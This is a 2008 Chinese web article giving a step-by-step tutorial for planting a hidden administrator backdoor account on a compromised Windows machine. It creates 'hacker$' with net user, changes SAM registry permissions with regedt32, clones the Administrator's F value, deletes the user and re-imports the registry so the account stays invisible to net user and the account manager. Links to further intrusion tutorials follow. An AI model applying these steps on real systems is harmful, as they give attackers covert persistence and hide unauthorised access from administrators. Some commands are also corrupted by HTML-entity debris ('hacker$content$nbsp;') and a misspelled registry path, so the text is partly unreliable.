当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 三分钟搞定隐藏管理员账号

三分钟搞定隐藏管理员账号

2008年10月08日 脚本攻防 我要评论
三分钟搞定隐藏管理员账号 对regedit.exe大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM... 08-10-08
对regedit.exe大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的hkey_local_machine\sam\sam键下,但是除了系统用户system外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对sam键为我设置为“完全控制”权限。这样就可以对sam键内的信息进行读写了了。具体步聚如下:   1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$content$nbsp;1234 /add   2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。   3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。   4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:hkey_local_maichine\sam\sam\domains\account\user\names\hacker$"   5、将项hacker$、00000409、000001f4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001f4下的键"f"的值复制,并覆盖hacker$对应的项00000409下的键"f"的值,然后再将00000409.reg与hacker.reg合并。   6、在命令行下执行net user hacker$content$nbsp;/del将用户hacker$删除:net user hacker$content$nbsp;/del   7、在regedit.exe的窗口内按f5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可   8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把hkey_local_machine\sam\sam键权限改回原来的样子(只要删除添加的帐户administrator即可)。   9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
(0)

相关文章:

  • 安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例 今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?... [阅读全文]
  • 有防火墙网站的入侵过程

    有防火墙网站的入侵过程

    有防火墙网站的入侵过程 一、踩点  ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个... [阅读全文]
  • 入侵某一游戏交易网

    入侵某一游戏交易网 在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程 一: 踩点 收集信息 因为这个…

    2008年10月08日 网络安全
  • RPC漏洞入侵

    RPC漏洞入侵 RPC(Remote Procedure Call, 远程过程调用)是操作系统的一种消息传递功能,微软的描述为:“一种能允许分布式应用程序调用网络上不同计算机的可…

    2008年10月08日 网络安全
  • 请注意入侵过程中的细节(三)(图)

    请注意入侵过程中的细节(三)(图)

    请注意入侵过程中的细节(三)(图) 前两期中的专栏中,针对细节入侵这一专题,我分别写了我在内网和注入中注意到的一些细节。其实入侵过程中,有时候难免会与管理员面... [阅读全文]
  • 入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法 假设是:www.fbi.gov.tw。^__^ 先让俺看看是不是连得上: C:ping www.fbi.gov.tw ... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com